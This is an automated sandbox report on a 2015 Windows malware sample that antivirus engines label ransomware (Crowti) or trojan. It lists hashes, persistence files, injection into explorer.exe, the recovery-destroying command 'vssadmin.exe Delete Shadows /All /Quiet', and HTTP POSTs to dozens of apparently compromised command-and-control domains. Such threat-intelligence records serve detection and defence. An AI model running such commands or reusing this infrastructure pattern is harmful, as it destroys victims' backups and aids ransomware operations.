Analysis Date: 2015-11-14 16:46:17
MD5: 363935b61936a78687bdab46907e5aef
SHA1: 4782dde6ba76d5b7344c288312d4e171c0cd14f6

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section Stext (md5: b36c8024b10407b371a0e5331e20e9d2, sha1: 6a8a0310d91dd59ea4a799c43ca162adac0914ec, size: 28672)
Section .rdata (md5: 38585e7ba8ad69fc19d090b1aa146825, sha1: a10369a6807c250809cbaf35cf5661c235967e19, size: 4096)
Section .dat (md5: 8ee0ba8cfc29eca9a52fa5609005843d, sha1: 36648a8e1b00af98b935225479e3d3267ea78c5b, size: 20480)
Section .idta (md5: 182c2418c71f9759674ebd3e1b810c03, sha1: 498f15957d2d672afa5a6ca2c9f43f3416f8c3f0, size: 4096)
Section eloc (md5: b88ea422d5a0a797938c7f252de64d15, sha1: 62a50d9411d569aab3816c0e7bb922d820d0d908, size: 8192)
Timestamp: 2015-10-02 17:26:34
Packer: Microsoft Visual C++ v6.0
PEhash: 7554a0c0f9847c5b4349ea1372d975b0e49f7310
IMPhash: 64d0f8ba0b76e1e525c2ded596d665d2
AV F-Secure: Gen:Variant.Zboter.2
AV Authentium: W32/Trojan.BDLL-0070
AV MalwareBytes: Trojan.Rovnix
AV Dr. Web: BackDoor.Siggen.60457
AV Grisoft (avg): Inject3.NZU
AV Eset (nod32): Win32/Injector.CLYT
AV MicroWorld (escan): Gen:Variant.Symmi.57537
AV Trend Micro: TROJ_FORUCON.BMC
AV ClamAV: no_virus
AV Twister: Trojan.Injector.CLXR.axpi
AV BitDefender: Gen:Variant.Zboter.2
AV Avira (antivir): TR/Crypt.ZPACK.203923
AV Alwil (avast): Dropper-gen [Drp]
AV Fortinet: W32/Generic.AC.3181361
AV Microsoft Security Essentials: Ransom:Win32/Crowti
AV Ikarus: Trojan.Win32.Injector
AV Kaspersky: Trojan.Win32.Generic
AV VirusBlokAda (vba32): no_virus
AV Arcabit (arcavir): Gen:Variant.Zboter.2
AV Mcafee: RDN/Generic.grp
AV Ad-Aware: Gen:Variant.Zboter.2
AV Symantec: PUA.Downloader
AV K7: Trojan ( 004d62251 )
AV Rising: no_virus
AV Frisk (f-prot): no_virus
AV Emsisoft: Gen:Variant.Zboter.2
AV Zillya!: no_virus
AV CAT (quickheal): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Zboter.2
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates File: C:\6ff06165\6ff06165.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process: vssadmin.exe Delete Shadows /All /Quiet
Creates Process: -k netsvcs

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: descargar-facebook-messenger.com
Winsock DNS: webandnoticias.com
Winsock DNS: myfacecom.com
Winsock DNS: asistent.su
Winsock DNS: snocmobilya.com
Winsock DNS: thecarnivalfest.com
Winsock DNS: euro-dom.de
Winsock DNS: nobilighting.com
Winsock DNS: sadefuar.com
Winsock DNS: spideragroscience.com
Winsock DNS: travancy.com
Winsock DNS: tamazawatokuichiro.com
Winsock DNS: perpabaskievi.net
Winsock DNS: naimselmonaj.com
Winsock DNS: virginia-education.com
Winsock DNS: zemamranews.com
Winsock DNS: curlmyip.com
Winsock DNS: konstructmarketing.com
Winsock DNS: abenorbenin.com
Winsock DNS: conectcon.com
Winsock DNS: primemovies.net
Winsock DNS: freeapkipa.com
Winsock DNS: myexternalip.com
Winsock DNS: noblevisage.com
Winsock DNS: shopshe.com
Winsock DNS: engagedforpeace.org
Winsock DNS: handmade.co.id
Winsock DNS: befitster.com
Winsock DNS: sudatrain.net
Winsock DNS: ip-addr.es
Winsock DNS: theboomerzblog.com
Winsock DNS: suttonfarms.net
Winsock DNS: sparshsewa.com
Winsock DNS: reanimator-service.com
Winsock DNS: doozfriend.com
Winsock DNS: fengfeifei.net
Winsock DNS: meaarts.com
Winsock DNS: project976.org
Winsock DNS: wpwarriors.com
Winsock DNS: promofordbekasi.com
Winsock DNS: xn--e1asbeck.xn--p1ai
Winsock DNS: bookstower.com
Winsock DNS: basketball256.com
Winsock DNS: rationwalaaa.com
Winsock DNS: grupointernex.com.br
Winsock DNS: icanconsultancy.org
Winsock DNS: forexinsuracembard.com
Winsock DNS: ipmon.net
Winsock DNS: ipanema-penthouse.com
Winsock DNS: pretor.su
Winsock DNS: vlsex.net
Winsock DNS: damozhai.com
Winsock DNS: therealdiehls.com
Winsock DNS: centroinformativoviral.com
Winsock DNS: droidmaza.com
Winsock DNS: immigrating.xsrv.jp
Winsock DNS: safepeace.com
Winsock DNS: gainsenligne.info
Winsock DNS: bolle-immobilien.de
Winsock DNS: tmp3malinium.com

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc

Network Details:

DNS: ip-addr.es (Type: A) ➝ 188.165.164.184
DNS: myexternalip.com (Type: A) ➝ 78.47.139.102
DNS: curlmyip.com (Type: A) ➝ 184.106.112.172
DNS: shopshe.com (Type: A) ➝ 184.168.47.225
DNS: basketball256.com (Type: A) ➝ 205.144.171.82
DNS: pretor.su (Type: A) ➝ 195.208.1.155
DNS: ipanema-penthouse.com (Type: A) ➝ 91.216.107.154
DNS: euro-dom.de (Type: A) ➝ 213.239.234.111
DNS: therealdiehls.com (Type: A) ➝ 192.169.57.44
DNS: theboomerzblog.com (Type: A) ➝ 184.168.47.225
DNS: gainsenligne.info (Type: A) ➝ 193.37.145.77
DNS: sudatrain.net (Type: A) ➝ 185.15.244.81
DNS: abenorbenin.com (Type: A) ➝ 91.216.107.152
DNS: wpwarriors.com (Type: A) ➝ 66.96.147.101
DNS: konstructmarketing.com (Type: A) ➝ 69.73.182.77
DNS: noblevisage.com (Type: A) ➝ 90.156.201.87
DNS: noblevisage.com (Type: A) ➝ 90.156.201.16
DNS: noblevisage.com (Type: A) ➝ 90.156.201.35
DNS: noblevisage.com (Type: A) ➝ 90.156.201.70
DNS: freeapkipa.com (Type: A) ➝ 178.17.168.34
DNS: forexinsuracembard.com (Type: A) ➝ 37.187.154.90
DNS: sadefuar.com (Type: A) ➝ 94.73.151.78
DNS: rationwalaaa.com (Type: A) ➝ 103.21.59.171
DNS: zemamranews.com (Type: A) ➝ 51.254.207.181
DNS: immigrating.xsrv.jp (Type: A) ➝ 183.90.232.29
DNS: befitster.com (Type: A) ➝ 208.91.199.77
DNS: snocmobilya.com (Type: A) ➝ 94.73.147.150
DNS: bolle-immobilien.de (Type: A) ➝ 213.239.234.111
DNS: vlsex.net (Type: A) ➝ 104.28.17.110
DNS: vlsex.net (Type: A) ➝ 104.28.16.110
DNS: suttonfarms.net (Type: A) ➝ 63.135.124.25
DNS: promofordbekasi.com (Type: A) ➝ 198.23.72.4
DNS: asistent.su (Type: A) ➝ 78.110.50.124
DNS: naimselmonaj.com (Type: A) ➝ 51.254.207.61
DNS: descargar-facebook-messenger.com (Type: A) ➝ 185.86.210.42
DNS: droidmaza.com (Type: A) ➝ 173.233.76.118
DNS: icanconsultancy.org (Type: A) ➝ 111.118.215.210
DNS: spideragroscience.com (Type: A) ➝ 103.21.59.171
DNS: damozhai.com (Type: A) ➝ 118.193.216.44
DNS: reanimator-service.com (Type: A) ➝ 176.114.1.110
DNS: perpabaskievi.net (Type: A) ➝ 77.245.149.18
DNS: doozfriend.com (Type: A) ➝ 208.91.198.220
DNS: project976.org (Type: A) ➝ 193.37.145.124
DNS: safepeace.com (Type: A) ➝ 103.21.59.171
DNS: primemovies.net (Type: A) ➝ 185.63.252.62
DNS: sparshsewa.com (Type: A) ➝ 103.21.59.171
DNS: ipmon.net (Type: A) ➝ 79.140.41.112
DNS: tamazawatokuichiro.com (Type: A) ➝ 209.54.52.223
DNS: webandnoticias.com (Type: A) ➝ 143.95.251.123
DNS: tmp3malinium.com (Type: A) ➝ 193.37.145.25
DNS: engagedforpeace.org (Type: A) ➝ 193.37.145.75
DNS: meaarts.com (Type: A) ➝ 103.21.59.171
DNS: conectcon.com (Type: A) ➝ 186.202.127.240
DNS: centroinformativoviral.com (Type: A) ➝ 205.144.171.80
DNS: xn--e1asbeck.xn--p1ai (Type: A) ➝ 195.208.1.155
DNS: virginia-education.com (Type: A) ➝ 37.210.196.227
DNS: nobilighting.com (Type: A) ➝ 112.78.2.45
DNS: travancy.com (Type: A) ➝ 199.79.62.19
DNS: grupointernex.com.br (Type: A) ➝ 192.198.195.229
DNS: bookstower.com (Type: A) ➝ 143.95.252.199
DNS: thecarnivalfest.com (Type: A) ➝ 103.21.59.171
DNS: handmade.co.id (Type: A)
DNS: fengfeifei.net (Type: A)
DNS: myfacecom.com (Type: A)
HTTP GET: http://ip-addr.es/
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://myexternalip.com/raw
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://curlmyip.com/
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://shopshe.com/jECfKN.php?d=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://basketball256.com/9xnMgP.php?s=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://pretor.su/ZLoNyf.php?o=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://ipanema-penthouse.com/lxUs6S.php?g=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://euro-dom.de/TzmNHk.php?b=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://therealdiehls.com/K3_J96.php?s=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://theboomerzblog.com/fQu7UH.php?w=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://gainsenligne.info/TiWyMt.php?n=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://sudatrain.net/De1uQF.php?c=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://abenorbenin.com/jcMISv.php?d=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://wpwarriors.com/gnHPMv.php?z=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://konstructmarketing.com/Ml63Pu.php?u=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://noblevisage.com/2qs9Rr.php?c=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://freeapkipa.com/Zw6oOb.php?i=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://forexinsuracembard.com/j97S0E.php?e=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://sadefuar.com/xdqHcr.php?w=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://rationwalaaa.com/QOPYrs.php?s=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://zemamranews.com/jxke9u.php?m=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://immigrating.xsrv.jp/5OUAvK.php?z=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://befitster.com/Bfv30s.php?y=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://snocmobilya.com/XqDZ4I.php?r=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://bolle-immobilien.de/Idvn79.php?q=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://vlsex.net/O4vH1A.php?w=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://suttonfarms.net/gqd1aw.php?d=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://promofordbekasi.com/6jVb5D.php?p=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://asistent.su/docs/xdEjFf.php?m=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://naimselmonaj.com/QoYx31.php?h=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://descargar-facebook-messenger.com/UjZHsJ.php?e=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://droidmaza.com/eHViNt.php?i=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://icanconsultancy.org/nm9Eul.php?i=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://spideragroscience.com/cWo1T2.php?t=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://damozhai.com/aJPK4y.php?t=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://reanimator-service.com/Y1U5s7.php?i=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://perpabaskievi.net/VCOzj5.php?p=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://doozfriend.com/T9Hqj0.php?p=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://project976.org/zyS9Kf.php?r=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://safepeace.com/_QXEd6.php?j=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://primemovies.net/z6Hfan.php?b=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://sparshsewa.com/5a8CTM.php?m=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://ipmon.net/CLuOIk.php?k=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://tamazawatokuichiro.com/TkCs3y.php?i=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://webandnoticias.com/t6xe1z.php?n=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://tmp3malinium.com/7DSCmu.php?n=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://engagedforpeace.org/R4uGnH.php?r=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://meaarts.com/bMUmqv.php?i=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://conectcon.com/evYR0G.php?k=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://centroinformativoviral.com/k6dYbZ.php?w=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://xn--e1asbeck.xn--p1ai/7xSCFU.php?k=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://virginia-education.com/8Ycy6k.php?j=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://asistent.su/F3eRnj.php?e=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://nobilighting.com/eX8yjr.php?u=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://travancy.com/8GBn_t.php?n=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://grupointernex.com.br/4cJIAr.php?d=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://bookstower.com/bmrWeQ.php?y=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://thecarnivalfest.com/mQF14M.php?e=c4os5jxsv0u0lz
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1033 ➝ 188.165.164.184:80
Flows TCP: 192.168.1.1:1034 ➝ 78.47.139.102:80
Flows TCP: 192.168.1.1:1035 ➝ 184.106.112.172:80
Flows TCP: 192.168.1.1:1036 ➝ 184.168.47.225:80
Flows TCP: 192.168.1.1:1037 ➝ 205.144.171.82:80
Flows TCP: 192.168.1.1:1038 ➝ 195.208.1.155:80
Flows TCP: 192.168.1.1:1039 ➝ 91.216.107.154:80
Flows TCP: 192.168.1.1:1040 ➝ 213.239.234.111:80
Flows TCP: 192.168.1.1:1041 ➝ 192.169.57.44:80
Flows TCP: 192.168.1.1:1042 ➝ 184.168.47.225:80
Flows TCP: 192.168.1.1:1043 ➝ 193.37.145.77:80
Flows TCP: 192.168.1.1:1044 ➝ 185.15.244.81:80
Flows TCP: 192.168.1.1:1045 ➝ 91.216.107.152:80
Flows TCP: 192.168.1.1:1046 ➝ 66.96.147.101:80
Flows TCP: 192.168.1.1:1047 ➝ 69.73.182.77:80
Flows TCP: 192.168.1.1:1048 ➝ 90.156.201.87:80
Flows TCP: 192.168.1.1:1049 ➝ 178.17.168.34:80
Flows TCP: 192.168.1.1:1050 ➝ 37.187.154.90:80
Flows TCP: 192.168.1.1:1051 ➝ 94.73.151.78:80
Flows TCP: 192.168.1.1:1052 ➝ 103.21.59.171:80
Flows TCP: 192.168.1.1:1053 ➝ 51.254.207.181:80
Flows TCP: 192.168.1.1:1054 ➝ 183.90.232.29:80
Flows TCP: 192.168.1.1:1055 ➝ 208.91.199.77:80
Flows TCP: 192.168.1.1:1056 ➝ 94.73.147.150:80
Flows TCP: 192.168.1.1:1057 ➝ 213.239.234.111:80
Flows TCP: 192.168.1.1:1058 ➝ 104.28.17.110:80
Flows TCP: 192.168.1.1:1059 ➝ 63.135.124.25:80
Flows TCP: 192.168.1.1:1060 ➝ 198.23.72.4:80
Flows TCP: 192.168.1.1:1061 ➝ 78.110.50.124:80
Flows TCP: 192.168.1.1:1062 ➝ 51.254.207.61:80
Flows TCP: 192.168.1.1:1063 ➝ 185.86.210.42:80
Flows TCP: 192.168.1.1:1064 ➝ 173.233.76.118:80
Flows TCP: 192.168.1.1:1065 ➝ 111.118.215.210:80
Flows TCP: 192.168.1.1:1066 ➝ 103.21.59.171:80
Flows TCP: 192.168.1.1:1067 ➝ 118.193.216.44:80
Flows TCP: 192.168.1.1:1068 ➝ 176.114.1.110:80
Flows TCP: 192.168.1.1:1069 ➝ 77.245.149.18:80
Flows TCP: 192.168.1.1:1070 ➝ 208.91.198.220:80
Flows TCP: 192.168.1.1:1071 ➝ 193.37.145.124:80
Flows TCP: 192.168.1.1:1072 ➝ 103.21.59.171:80
Flows TCP: 192.168.1.1:1073 ➝ 185.63.252.62:80
Flows TCP: 192.168.1.1:1074 ➝ 103.21.59.171:80
Flows TCP: 192.168.1.1:1075 ➝ 79.140.41.112:80
Flows TCP: 192.168.1.1:1076 ➝ 209.54.52.223:80
Flows TCP: 192.168.1.1:1077 ➝ 143.95.251.123:80
Flows TCP: 192.168.1.1:1078 ➝ 193.37.145.25:80
Flows TCP: 192.168.1.1:1079 ➝ 193.37.145.75:80
Flows TCP: 192.168.1.1:1080 ➝ 103.21.59.171:80
Flows TCP: 192.168.1.1:1081 ➝ 186.202.127.240:80
Flows TCP: 192.168.1.1:1082 ➝ 205.144.171.80:80
Flows TCP: 192.168.1.1:1083 ➝ 195.208.1.155:80
Flows TCP: 192.168.1.1:1084 ➝ 37.210.196.227:80
Flows TCP: 192.168.1.1:1085 ➝ 78.110.50.124:80
Flows TCP: 192.168.1.1:1086 ➝ 112.78.2.45:80
Flows TCP: 192.168.1.1:1087 ➝ 199.79.62.19:80
Flows TCP: 192.168.1.1:1088 ➝ 192.198.195.229:80
Flows TCP: 192.168.1.1:1089 ➝ 143.95.252.199:80
Flows TCP: 192.168.1.1:1090 ➝ 103.21.59.171:80